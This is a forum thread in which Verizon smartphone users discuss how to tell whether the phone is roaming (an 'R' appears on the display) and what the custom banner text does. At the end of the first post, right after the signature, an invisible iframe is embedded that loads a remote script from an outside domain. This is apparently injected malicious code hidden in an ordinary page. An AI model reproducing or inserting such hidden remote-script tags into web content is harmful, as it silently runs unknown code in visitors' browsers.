+ Reply to Thread

Verizon "in network" indicator?

My 7135 isn't giving me any indication whether I'm in my home network area or not. (The green flashing light issue has been discussed before, and apparently doen't flash green when in standby mode).

Hunting around, I noticed that in "Phone preferences" under "Display" I can enter text in the "banner field". I entered "Verizon" there and now it says Verizon on the phone's main display, but I have no idea if this actually means anything...

Is there any way to know for sure if you are in your home network area? (and yes, I have had the the prl updated, and *228, etc.) Also, does anyone know if it will show when I'm in another network, and identify whose?

Thanks,
    Mark<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

If you are not in your home network, you will have an "R" on the LCD display as well as in the status area of the phone application.

Alan

Is the green light SUPPOSE to flash when not in a call?

Originally posted by RMSko
    Is the green light SUPPOSE to flash when not in a call?
    No. This is covered in the 7135 LED FAQ.

See http://www.smartphonesource.com/vbul...&threadid=4755

So what is the banner text all about (that I mentioned in the first post)?

You can put anything you want in the banner.. It doesn't affect anything except the banner.

Dave's right, I have mine set to "Smartest of them all" Its no different than the 6035 which I used to have programmed as Mark's Smartphone.

Hmmm... My 6035 banner used to say "Verizon" as well, and I know I didn't put it there. I guess the VZ store must have done that. I thought that went away when I was roaming, but maybe not...

My banner says - "If found call XXX-YYY-ZZZZ" for the tiny chance that if I lose it, some good soul will call my land line. It actually worked once when I left it on a plane!

mhzimmer-

I think you're right. My banner on my 6035 had my name, but when roaming, it said "Roam".

Originally posted by ZZLeGrand
    My banner says - "If found call XXX-YYY-ZZZZ" for the tiny chance that if I lose it, some good soul will call my land line. It actually worked once when I left it on a plane!
    Good idea. I also know people that put their email address there in case it gets lost.
    ~'kito
    pdaPhoneHome Moderator